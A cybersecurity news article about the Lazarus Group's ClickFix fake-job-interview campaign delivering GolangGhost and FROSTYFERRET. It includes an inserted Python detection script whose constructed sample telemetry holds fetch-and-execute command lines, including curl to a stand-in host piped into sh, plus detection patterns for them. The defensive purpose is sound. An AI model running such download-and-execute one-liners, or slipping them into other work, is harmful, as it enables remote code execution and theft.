Cyber security news for all

    North Korean Lazarus Group Uses New Social Engineering Trick to Spread Golang-Based Malware

    North Korea-linked cybercriminals have stepped up their social engineering tactics, using a new method dubbed ClickFix to deceive job seekers in the cryptocurrency sector. The campaign, part of a broader operation known as ClickFake Interview, involves deploying a newly identified malware called GolangGhost, which is capable of targeting both Windows and macOS systems.

    First observed in late 2022, this campaign represents an evolution of previous fake job interview schemes, such as “Operation Dream Job,” which similarly targeted professionals in the crypto and tech industries with enticing job offers. In this latest variant, attackers masquerade as recruiters from prominent centralized finance platforms like Coinbase, Kraken, Circle, Robinhood, and others—marking a shift from the previous focus on decentralized finance (DeFi) targets.

    Victims are contacted via platforms like LinkedIn or X (formerly Twitter) and invited to participate in a supposed video interview. As part of the interview process, they are directed to a fake video service named Willo and asked to perform a system check. When attempting to activate their camera or microphone, a fabricated error message prompts users to download a “driver” to resolve the issue. This is the moment the ClickFix tactic is executed.

    Depending on the user’s operating system, instructions vary:

    • Windows users are prompted to run a curl command in Command Prompt that downloads and executes a Visual Basic Script (VBS), which launches a batch file to install GolangGhost.

    • macOS users are instructed to run a shell script via Terminal, which triggers a secondary script that downloads both the FROSTYFERRET stealer (also known as ChromeUpdateAlert) and the backdoor.
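Both branches of the chain above share one observable: an interactive shell that a user was told to paste a command into spawns curl against a URL, and a script interpreter then runs what was fetched (or the one-liner pipes curl straight into sh). The detection below is an added example written for this article, not code from the researchers or from any vendor; the `ProcEvent` record is a constructed simplification of the process-creation events an EDR, Sysmon or macOS Endpoint Security pipeline emits, and every host name, user, PID and URL in the sample data is made up.

```python
"""Detect the ClickFix 'paste this into a terminal' infection chain in
process-creation telemetry.

Added example, not from the article: ProcEvent is a constructed simplification
of EDR / Sysmon / Endpoint Security process events, and the sample events and
URLs below are made up."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    ts: float      # seconds since the start of the sample window (constructed)
    host: str
    user: str
    pid: int
    ppid: int
    image: str     # lower-case image basename, e.g. "curl.exe", "zsh"
    cmdline: str


# Interactive shells the victim is told to paste the command into.
SHELLS = {"cmd.exe", "powershell.exe", "bash", "zsh", "sh"}
# Interpreters that run the downloaded stage (VBS on Windows, shell on macOS).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "bash", "zsh", "sh"}
DOWNLOADERS = {"curl.exe", "curl"}

URL_RE = re.compile(r"https?://\S+", re.I)
SCRIPT_FILE_RE = re.compile(r"\S+\.(?:vbs|bat|cmd|sh)\b", re.I)
# "curl ... | sh" as it appears inside an `sh -c "..."` command line.
PIPE_TO_SHELL_RE = re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b", re.I)


def find_clickfix_chains(events: List[ProcEvent], window: float = 120.0) -> List[Dict]:
    """Return one finding per suspicious chain.

    Pattern A (download-then-execute): curl launched from an interactive shell
    with a URL and a script-file argument, followed within `window` seconds by
    a script host executing a script file for the same host and user.
    Pattern B (curl-pipe-shell): one command line pipes curl output into sh.
    """
    events = sorted(events, key=lambda e: e.ts)
    by_pid = {e.pid: e for e in events}
    findings: List[Dict] = []

    for e in events:
        # Pattern B needs no second stage: the one-liner is the whole chain.
        if URL_RE.search(e.cmdline) and PIPE_TO_SHELL_RE.search(e.cmdline):
            findings.append({"host": e.host, "user": e.user,
                             "pattern": "curl-pipe-shell", "evidence": [e.cmdline]})
            continue

        if e.image not in DOWNLOADERS or not URL_RE.search(e.cmdline):
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image not in SHELLS:
            continue
        if not SCRIPT_FILE_RE.search(e.cmdline):
            continue  # curl fetching JSON from a developer shell is normal

        # Pattern A: find the script host that runs the fetched file.
        for f in events:
            if (f.host == e.host and f.user == e.user
                    and f.image in SCRIPT_HOSTS
                    and e.ts <= f.ts <= e.ts + window
                    and SCRIPT_FILE_RE.search(f.cmdline)):
                findings.append({"host": e.host, "user": e.user,
                                 "pattern": "download-then-execute",
                                 "evidence": [e.cmdline, f.cmdline]})
                break
    return findings


# Constructed sample telemetry: two victims and one benign developer.
SAMPLE_EVENTS = [
    # Windows: cmd.exe -> curl fetches a "driver" VBS -> wscript runs it
    ProcEvent(0.0, "ws-fin-07", "alice", 4100, 3000, "cmd.exe", "cmd.exe"),
    ProcEvent(4.2, "ws-fin-07", "alice", 4111, 4100, "curl.exe",
              'curl -o "C:\\Users\\alice\\AppData\\Local\\Temp\\driver.vbs" '
              'https://fake-interview.example.invalid/driver.vbs'),
    ProcEvent(6.9, "ws-fin-07", "alice", 4120, 4100, "wscript.exe",
              'wscript.exe "C:\\Users\\alice\\AppData\\Local\\Temp\\driver.vbs"'),
    # macOS: Terminal zsh -> sh -c "curl ... | sh"
    ProcEvent(0.0, "mbp-bd-02", "bob", 8100, 7000, "zsh", "-zsh"),
    ProcEvent(2.5, "mbp-bd-02", "bob", 8104, 8100, "sh",
              'sh -c "curl -sL https://fake-interview.example.invalid/camera_fix.sh | sh"'),
    # Benign: curl of a JSON API, then a local build script, no download in between
    ProcEvent(1.0, "dev-01", "carol", 9100, 9000, "bash", "bash"),
    ProcEvent(3.0, "dev-01", "carol", 9102, 9100, "curl",
              "curl -s https://api.internal.example/v1/health"),
    ProcEvent(9.0, "dev-01", "carol", 9103, 9100, "bash", "bash ./scripts/build.sh"),
]

if __name__ == "__main__":
    for finding in find_clickfix_chains(SAMPLE_EVENTS):
        print(finding)
```

To run this against real data, map Sysmon Event ID 1 fields (Image, CommandLine, ProcessId, ParentProcessId) or the macOS Endpoint Security exec event into `ProcEvent`; the parent-is-an-interactive-shell check is what separates a pasted command from a packaged installer, and the script-file requirement on the curl command line keeps ordinary API calls from developer shells out of the alert queue.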

    FROSTYFERRET presents a fake Chrome permission prompt asking for camera/microphone access. Once users enter their system password—regardless of accuracy—the credentials are exfiltrated to a remote Dropbox account. Researchers believe this may be part of a broader effort to extract iCloud Keychain data.

    GolangGhost allows remote attackers to control infected systems, exfiltrate files, harvest browser data, and collect system information. Interestingly, unlike earlier efforts that mainly targeted developers, this campaign is aimed at non-technical roles in business development, asset management, and DeFi project leadership.

    Meanwhile, a separate yet connected operation has seen North Korean IT workers infiltrating European tech firms by posing as freelancers. These operatives have been observed using platforms like Upwork and Freelancer, fabricating personas with identities from countries such as Italy, Vietnam, Japan, and Singapore. Payments are often routed through cryptocurrencies or services like TransferWise and Payoneer, helping to obscure the money trail.

    Recent trends also suggest a rise in insider extortion, with North Korean operatives threatening companies with data leaks unless ransom payments are made. They’re now increasingly targeting firms with Bring Your Own Device (BYOD) policies due to the lack of strong endpoint security on personal devices.

    Security experts warn that Europe must not underestimate the threat, which has already expanded beyond the U.S. and shows signs of strategic adaptation by North Korean cyber units. From SWIFT banking hacks and ransomware to crypto heists and supply chain compromises, Pyongyang’s cyber operations continue to evolve as a key source of funding for the regime.
